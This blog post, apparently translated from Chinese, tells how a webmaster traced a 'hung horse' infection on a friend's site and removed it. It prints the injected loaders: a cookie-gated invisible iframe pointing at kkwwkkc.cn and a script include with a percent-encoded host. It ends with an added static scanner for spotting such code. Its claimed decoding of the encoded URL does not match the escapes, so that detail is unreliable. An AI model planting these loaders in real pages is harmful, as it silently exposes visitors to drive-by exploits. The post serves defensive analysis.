How to track down a "hung horse" (injected malicious code) on a website

Source: Internet
Author: User
Keywords: Security


Last night the Deep netizen "a Connaught the child" reported to me that one of the linked websites had a Trojan horse. I looked and, dizzy, wasn't that the site I am helping a friend optimize for the keyword "QQ personality signature"? At first I thought it was just an antivirus false positive, and since I had no antivirus software installed (I have never had a virus), I did not pay much attention to it.

When I got up today I used my new mobile phone ((*^__^*) hee hee ... I bought a BlackBerry 8100) to open Baidu and search for "QQ personality signature" and, dizzy, the ranking had fallen I do not know how many pages. I was depressed: my SEO optimization has always been very gentle, so how could the site have been demoted? So I guessed it might really have had a horse hung on it. Since this is a friend I only recently met, of course I would help deal with these trivial problems. Back home, I immediately enabled the German antivirus "small red umbrella", and with a "beep, beep" it raised an alarm when I opened the QQ personality signature site. I then viewed the HTML source and, strangely, there was no IFRAME. So I cleared the cache, opened the web page again, and used the information provided by the small red umbrella to find the file that triggered the alarm, info[1].js. Opening it gave the following code:

// Runs once a day per visitor: skipped if the "qqqq" marker cookie is already set.
var az=document.cookie;
var za=az.indexOf("qqqq");
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="qqqq=web;expires="+expires.toGMTString();
// Writes a zero-height (invisible) iframe that loads the next page in the chain.
document.writeln("<iframe src=http:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0><\/iframe>");window.status="";}

I figured the problem had to be in the JS code, so I searched the page source for JS: one file was the 51la statistics JS and the other was div.js. 51la could naturally be ruled out, so I opened div.js and saw the following code with an encoded URL (in red font). Tracking it down, I did indeed find suspicious signs.


// JavaScript Document
function Showdiv(divnum,divbefor,id){
    for(i=1;i<=divnum;i++){
        try{
            if(i==divbefor){
                document.getElementById(id+i).style.display="inline";
            }else{
                document.getElementById(id+i).style.display="none";
            }
        }catch(e){}
    }
}
function Menufix(){}
// The line below pulls in a script from a host written in percent-encoding.
document.writeln("<script src=http:\/\/%78%69%73%68%69%79%69%2e%63%6f%6d\/images\/main\/info.js><\/script>");

Tracing the code: http:\/\/%78%69%73%68%69%79%69%2e%63%6f%6d\/images\/main\/info.js
Entering it directly into Firefox converts it to the following address: http://www.91q.org/templets/images/div.js. Opening it gives the following code:

var az=document.cookie;
var za=az.indexOf("qqqq");
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="qqqq=web;expires="+expires.toGMTString();
document.writeln("<iframe src=http:\/\/kkwwkkc.cn\/10\/zz.htm width=100 height=0><\/iframe>");window.status="";}

Continuing to follow the iframe: http://kkwwkkc.cn/10/zz.htm
Opening it gives the following code:

<iframe src=123.htm width=100 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/2191926.js"></script>
<noscript><a href="http://www.51.la/?2191926" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/2191926.asp" style="border:none" /></a></noscript>

Continuing to follow the iframe: http://kkwwkkc.cn/10/123.htm
Opening it returned this "King eight" (bastard) code: a script block that passes one long string of octal escapes to eval().


I am not skilled enough to understand what the transformed code means and did not want to convert it; knowing that a horse had been hung was enough. In the end I told my friend to remove that code. After clearing the cache and reopening the web page, everything was OK, no problem.

My intention in writing this article is to remind you to pay attention to the security of your own site. If you find a hung horse, do not overlook any detail: first carefully check whether the HTML page calls anything from other, unexplained sites, then carefully analyze the JS code of your own pages. IFRAME is the means hackers use most often. I hope this example is useful to you. This is my first time catching a horse, and I caught it through my own analysis, so I am very happy and hereby share it ...
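The checks described above (script and IFRAME includes from other sites, addresses hidden behind percent-encoding or octal escapes), written as a static scanner. This is an added example, not code from the original article; the names `triage`, `decodeOctal` and `ownHosts`, the host `www.mysite.example` and both sample strings are constructed for illustration.

```javascript
// Static triage of JS/HTML text for injected <script>/<iframe> loaders.
// The input is treated as text only; nothing from it is ever evaluated.

// Decode JS octal string escapes as the engine would (\0 to \377).
function decodeOctal(text) {
  return text.replace(/\\([0-3][0-7]{0,2}|[4-7][0-7]?)/g,
    (_, oct) => String.fromCharCode(parseInt(oct, 8)));
}

// Percent-decode, returning the input unchanged if it is malformed.
function safePercentDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// One finding per <script>/<iframe> that has a src, after peeling escapes.
// ownHosts: hostnames the site is expected to load from (assumption).
function triage(source, ownHosts) {
  const text = decodeOctal(source).replace(/\\\//g, '/');
  const tagRe = /<(script|iframe)\b([^>]*)>/gi;
  const findings = [];
  let m;
  while ((m = tagRe.exec(text)) !== null) {
    const src = /\bsrc\s*=\s*["']?([^\s"'>]+)/i.exec(m[2]);
    if (!src) continue;
    const url = safePercentDecode(src[1]);
    const hostMatch = /^(?:https?:)?\/\/([^\/:?#]+)/i.exec(url);
    const host = hostMatch ? hostMatch[1].toLowerCase() : null;
    findings.push({
      tag: m[1].toLowerCase(), url, host,
      external: host !== null && !ownHosts.includes(host),
      encodedHost: /^(?:https?:)?\/\/[^\/]*%[0-9a-f]{2}/i.test(src[1]),
      hidden: /\b(?:width|height)\s*=\s*["']?0\b/i.test(m[2]),
    });
  }
  return findings;
}

// Constructed samples (not the article's files): a script include with a
// percent-encoded host, and an eval() whose octal escapes hide an iframe.
const SAMPLE_INCLUDE = String.raw`document.writeln("<script src=http:\/\/%65%78%61%6d%70%6c%65%2e%69%6e%76%61%6c%69%64\/images\/info.js><\/script>");`;
const SAMPLE_EVAL = String.raw`eval("\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\142\56\145\170\141\155\160\154\145\57\170\56\150\164\155\40\150\145\151\147\150\164\75\60\76");`;

function demo() {
  return triage(SAMPLE_INCLUDE + '\n' + SAMPLE_EVAL, ['www.mysite.example']);
}
for (const f of demo()) console.log(JSON.stringify(f));
```

A relative src such as `123.htm` is reported with `host` set to `null`; resolve it against the page it was found on before following it.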

This article is supplied by the webmaster of http://www.91q.org. Copyright notice: the works on this site are licensed under the Creative Commons "Attribution 2.5 China Mainland" license; reprints must credit Deep Technology and the original address.

Original address: http://www.pcliver.cn/archives/279.html
